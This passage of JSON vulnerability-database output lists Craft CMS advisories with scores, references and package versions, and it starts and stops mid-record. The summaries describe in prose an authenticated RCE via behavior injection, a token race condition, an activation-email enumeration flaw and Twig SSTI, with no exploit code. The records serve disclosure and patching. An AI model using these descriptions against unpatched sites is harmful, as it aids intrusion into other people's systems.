packages/118774?format=json","purl":"pkg:composer/craftcms/cms@4.17.12","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.12"},{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44011","GHSA-qrgm-p9w5-rrfw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ca4-tbhq-27ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50068?format=json","vulnerability_id":"VCID-9enr-b6zd-mbh8","summary":"Craft CMS Vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nA Remote Code Execution (RCE) vulnerability exists in Craft CMS where the `assembleLayoutFromPost()` function in `src/services/Fields.php` fails to sanitize user-supplied configuration data before passing it to `Craft::createObject()`. This allows authenticated administrators to inject malicious Yii2 behavior configurations that execute arbitrary system commands on the server. This vulnerability represents an **unpatched variant** of the behavior injection vulnerability addressed in GHSA-255j-qw47-wjh5, affecting different endpoints through a separate code path.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498","reference_id":"","reference_type":"","scores":[{"value":"0.00315","scoring_system":"epss","scoring_elements":"0.54952","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498","reference_id":"CVE-2026-25498","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25498"},{"reference_url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7jx7-3846-m7w7"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73947?format=json","purl":"pkg:composer/craftcms/cms@4.16.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.18"},{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25498","GHSA-7jx7-3846-m7w7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9enr-b6zd-mbh8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50299?format=json","vulnerability_id":"VCID-a3b5-pwyh-yugv","summary":"Craft CMS Race condition in Token Service potentially allows for token usage greater than the token limit\nA Time-of-Check-Time-of-Use (TOCTOU) race condition exists in Craft CMS’s token validation service for tokens that explicitly set a limited usage. The `getTokenRoute()` method reads a token’s usage count, checks if it’s within limits, then updates the database in separate non-atomic operations. By sending concurrent requests, an attacker can use a single-use impersonation token multiple times before the database update completes.\n\nTo make this work, an attacker needs to obtain a valid user account impersonation URL with a non-expired token via some other means and exploit a race condition while bypassing any rate-limiting rules in place.\n\nFor this to be a privilege escalation, the impersonation URL must include a token for a user account with more permissions than the current user.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00627","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27128"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/commit/3e4afe18279951c024c64896aa2b93cda6d95fdf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128","reference_id":"CVE-2026-27128","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27128"},{"reference_url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6fx5-5cw5-4897"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897","reference_id":"GHSA-6fx5-5cw5-4897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:13:24Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6fx5-5cw5-4897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74189?format=json","purl":"pkg:composer/craftcms/cms@4.16.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.19"},{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27128","GHSA-6fx5-5cw5-4897"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a3b5-pwyh-yugv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50678?format=json","vulnerability_id":"VCID-akrv-yqnf-1kg8","summary":"Craft CMS has unauthenticated activation email trigger with potential user enumeration\nThe `actionSendActivationEmail()` endpoint is accessible to unauthenticated users and does not require a permission check for pending users. An attacker with no prior access can trigger activation emails for any pending user account by knowing or guessing the user ID. If the attacker controls the target user’s email address, they can activate the account and gain access to the system.\n\nThe vulnerability is not that anonymous access exists - there’s a legitimate use case for it. The vulnerability is that the endpoint accepts arbitrary `userId` parameters without verifying ownership.\n\nCraft CMS allows public user registration. When a user registers but doesn’t receive their activation email (spam filter, typo correction, etc.), they need a way to request a resend. This is why `send-activation-email` is in the `allowAnonymous` array - it’s intentional self-service functionality.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17879","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29069"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/commit/c3d02d4a7246f516933f42106c0a67ce062f68d8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069","reference_id":"CVE-2026-29069","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29069"},{"reference_url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-234q-vvw3-mrfq"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq","reference_id":"GHSA-234q-vvw3-mrfq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:30:03Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-234q-vvw3-mrfq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74443?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.2"},{"url":"http://public2.vulnerablecode.io/api/packages/74442?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.2"}],"aliases":["CVE-2026-29069","GHSA-234q-vvw3-mrfq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-akrv-yqnf-1kg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50613?format=json","vulnerability_id":"VCID-azr5-12f8-hfbm","summary":"Craft CMS has potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, the attacker must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, they can have a non-administrator account with `allowAdminChanges` disabled, but they must have access to the System Messages utility.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE.\n\nUsers should update to the patched versions (5.8.22 and 4.16.18) to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/pull/18208","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.0618","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28784"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784","reference_id":"CVE-2026-28784","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28784"},{"reference_url":"https://github.com/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qc86-q28f-ggww"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww","reference_id":"GHSA-qc86-q28f-ggww","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:32:46Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-qc86-q28f-ggww"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-